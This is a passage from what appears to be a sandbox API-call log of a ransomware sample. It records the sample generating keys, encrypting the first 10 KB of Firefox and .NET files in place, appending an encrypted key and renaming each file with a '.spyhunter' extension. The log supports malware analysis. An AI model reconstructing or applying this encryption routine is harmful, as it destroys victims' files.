hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec05c0 | out: hHeap=0x2c0000) returned 1 [0163.870] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce660 | out: pbBuffer=0x25ce660) returned 1 [0163.870] GetProcessHeap () returned 0x2c0000 [0163.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.870] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce658*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce658*=0x30) returned 1 [0163.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0163.871] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml") returned 76 [0163.871] StrStrW (lpFirst="twitter.xml", lpSrch=".txt") returned 0x0 [0163.871] GetProcessHeap () returned 0x2c0000 [0163.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.871] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce61c*=0xb91, lpOverlapped=0x0) returned 1 [0163.872] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff46f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.872] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb91, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce61c*=0xb91, lpOverlapped=0x0) returned 1 [0163.872] GetProcessHeap () returned 0x2c0000 [0163.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.873] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.873] WriteFile (in: hFile=0x178, lpBuffer=0x25ce65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x25ce65c*, lpNumberOfBytesWritten=0x25ce61c*=0x4, lpOverlapped=0x0) returned 1 [0163.873] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce61c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce61c*=0x30, lpOverlapped=0x0) returned 1 [0163.873] CloseHandle (hObject=0x178) returned 1 [0163.873] GetProcessHeap () returned 0x2c0000 [0163.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.873] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml.spyhunter") returned 86 [0163.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\twitter.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\twitter.xml.spyhunter")) returned 1 [0163.874] GetProcessHeap () returned 0x2c0000 [0163.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.874] GetProcessHeap () returned 0x2c0000 [0163.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.874] GetProcessHeap () returned 0x2c0000 [0163.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeb4c0 | out: hHeap=0x2c0000) returned 1 [0163.874] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce658 | out: pbBuffer=0x25ce658) returned 1 [0163.874] GetProcessHeap () returned 0x2c0000 [0163.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.874] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce650*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce650*=0x30) returned 1 [0163.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0163.875] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml") returned 75 [0163.876] StrStrW (lpFirst="google.xml", lpSrch=".txt") returned 0x0 [0163.876] GetProcessHeap () returned 0x2c0000 [0163.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0163.876] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce614*=0xb9b, lpOverlapped=0x0) returned 1 [0163.997] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff465, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0163.997] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb9b, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce614*=0xb9b, lpOverlapped=0x0) returned 1 [0163.997] GetProcessHeap () returned 0x2c0000 [0163.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0163.997] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0163.997] WriteFile (in: hFile=0x178, lpBuffer=0x25ce654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x25ce654*, lpNumberOfBytesWritten=0x25ce614*=0x4, lpOverlapped=0x0) returned 1 [0163.997] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce614*=0x30, lpOverlapped=0x0) returned 1 [0163.997] CloseHandle (hObject=0x178) returned 1 [0163.998] GetProcessHeap () returned 0x2c0000 [0163.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0163.998] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml.spyhunter") returned 85 [0163.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\google.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\google.xml.spyhunter")) returned 1 [0163.999] GetProcessHeap () returned 0x2c0000 [0163.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0163.999] GetProcessHeap () returned 0x2c0000 [0163.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0163.999] GetProcessHeap () returned 0x2c0000 [0163.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee56d0 | out: hHeap=0x2c0000) returned 1 [0163.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce658 | out: pbBuffer=0x25ce658) returned 1 [0163.999] GetProcessHeap () returned 0x2c0000 [0163.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0163.999] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce650*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce650*=0x30) returned 1 [0163.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.000] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml") returned 81 [0164.000] StrStrW (lpFirst="amazondotcom.xml", lpSrch=".txt") returned 0x0 [0164.000] GetProcessHeap () returned 0x2c0000 [0164.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.000] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce614*=0x9a0, lpOverlapped=0x0) returned 1 [0164.065] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff660, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.065] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce614*=0x9a0, lpOverlapped=0x0) returned 1 [0164.065] GetProcessHeap () returned 0x2c0000 [0164.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.065] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.065] WriteFile (in: hFile=0x178, lpBuffer=0x25ce654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x25ce654*, lpNumberOfBytesWritten=0x25ce614*=0x4, lpOverlapped=0x0) returned 1 [0164.065] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce614*=0x30, lpOverlapped=0x0) returned 1 [0164.065] CloseHandle (hObject=0x178) returned 1 [0164.066] GetProcessHeap () returned 0x2c0000 [0164.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.066] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml.spyhunter") returned 91 [0164.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml.spyhunter")) returned 1 [0164.067] GetProcessHeap () returned 0x2c0000 [0164.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.067] GetProcessHeap () returned 0x2c0000 [0164.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.067] GetProcessHeap () returned 0x2c0000 [0164.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf190 | out: hHeap=0x2c0000) returned 1 [0164.067] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce650 | out: pbBuffer=0x25ce650) returned 1 [0164.067] GetProcessHeap () returned 0x2c0000 [0164.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.067] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce648*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce648*=0x30) returned 1 [0164.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.068] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja") returned 58 [0164.068] StrStrW (lpFirst="omni.ja", lpSrch=".txt") returned 0x0 [0164.068] GetProcessHeap () returned 0x2c0000 [0164.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.068] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce60c*=0x2800, lpOverlapped=0x0) returned 1 [0164.098] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.098] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce60c*=0x2800, lpOverlapped=0x0) returned 1 [0164.098] GetProcessHeap () returned 0x2c0000 [0164.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.098] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.099] WriteFile (in: hFile=0x178, lpBuffer=0x25ce64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x25ce64c*, lpNumberOfBytesWritten=0x25ce60c*=0x4, lpOverlapped=0x0) returned 1 [0164.103] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce60c*=0x30, lpOverlapped=0x0) returned 1 [0164.103] CloseHandle (hObject=0x178) returned 1 [0164.217] GetProcessHeap () returned 0x2c0000 [0164.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0164.217] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja.spyhunter") returned 68 [0164.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja.spyhunter")) returned 1 [0164.219] GetProcessHeap () returned 0x2c0000 [0164.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0164.219] GetProcessHeap () returned 0x2c0000 [0164.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.219] GetProcessHeap () returned 0x2c0000 [0164.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8578 | out: hHeap=0x2c0000) returned 1 [0164.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce650 | out: pbBuffer=0x25ce650) returned 1 [0164.219] GetProcessHeap () returned 0x2c0000 [0164.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce648*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce648*=0x30) returned 1 [0164.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.321] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest") returned 81 [0164.321] StrStrW (lpFirst="components.manifest", lpSrch=".txt") returned 0x0 [0164.321] GetProcessHeap () returned 0x2c0000 [0164.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.321] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce60c*=0x22, lpOverlapped=0x0) returned 1 [0164.322] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffde, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.322] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce60c*=0x22, lpOverlapped=0x0) returned 1 [0164.322] GetProcessHeap () returned 0x2c0000 [0164.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.322] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.322] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x25ce64c*, lpNumberOfBytesWritten=0x25ce60c*=0x4, lpOverlapped=0x0) returned 1 [0164.322] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce60c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce60c*=0x30, lpOverlapped=0x0) returned 1 [0164.322] CloseHandle (hObject=0x9c) returned 1 [0164.322] GetProcessHeap () returned 0x2c0000 [0164.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.322] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest.spyhunter") returned 91 [0164.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest.spyhunter")) returned 1 [0164.323] GetProcessHeap () returned 0x2c0000 [0164.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.323] GetProcessHeap () returned 0x2c0000 [0164.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.323] GetProcessHeap () returned 0x2c0000 [0164.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf0a0 | out: hHeap=0x2c0000) returned 1 [0164.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce648 | out: pbBuffer=0x25ce648) returned 1 [0164.324] GetProcessHeap () returned 0x2c0000 [0164.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce640*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce640*=0x30) returned 1 [0164.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.324] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll") returned 63 [0164.324] StrStrW (lpFirst="breakpadinjector.dll", lpSrch=".txt") returned 0x0 [0164.324] GetProcessHeap () returned 0x2c0000 [0164.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.324] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce604*=0x2800, lpOverlapped=0x0) returned 1 [0164.363] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.363] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce604*=0x2800, lpOverlapped=0x0) returned 1 [0164.364] GetProcessHeap () returned 0x2c0000 [0164.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.364] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.364] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x25ce644*, lpNumberOfBytesWritten=0x25ce604*=0x4, lpOverlapped=0x0) returned 1 [0164.364] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25ce604*=0x30, lpOverlapped=0x0) returned 1 [0164.364] CloseHandle (hObject=0x9c) returned 1 [0164.365] GetProcessHeap () returned 0x2c0000 [0164.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.365] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.spyhunter") returned 73 [0164.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll.spyhunter")) returned 1 [0164.366] GetProcessHeap () returned 0x2c0000 [0164.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.366] GetProcessHeap () returned 0x2c0000 [0164.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0164.366] GetProcessHeap () returned 0x2c0000 [0164.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5628 | out: hHeap=0x2c0000) returned 1 [0164.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce648 | out: pbBuffer=0x25ce648) returned 1 [0164.366] GetProcessHeap () returned 0x2c0000 [0164.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0164.366] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce640*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce640*=0x30) returned 1 [0164.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml") returned 79 [0164.462] StrStrW (lpFirst="AssemblyList_4_extended.xml", lpSrch=".txt") returned 0x0 [0164.462] GetProcessHeap () returned 0x2c0000 [0164.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.463] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce604*=0x201c, lpOverlapped=0x0) returned 1 [0164.478] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffdfe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.478] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x201c, lpNumberOfBytesWritten=0x25ce604, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce604*=0x201c, lpOverlapped=0x0) returned 1 [0164.478] GetProcessHeap () returned 0x2c0000 [0164.478] HeapFree (in: 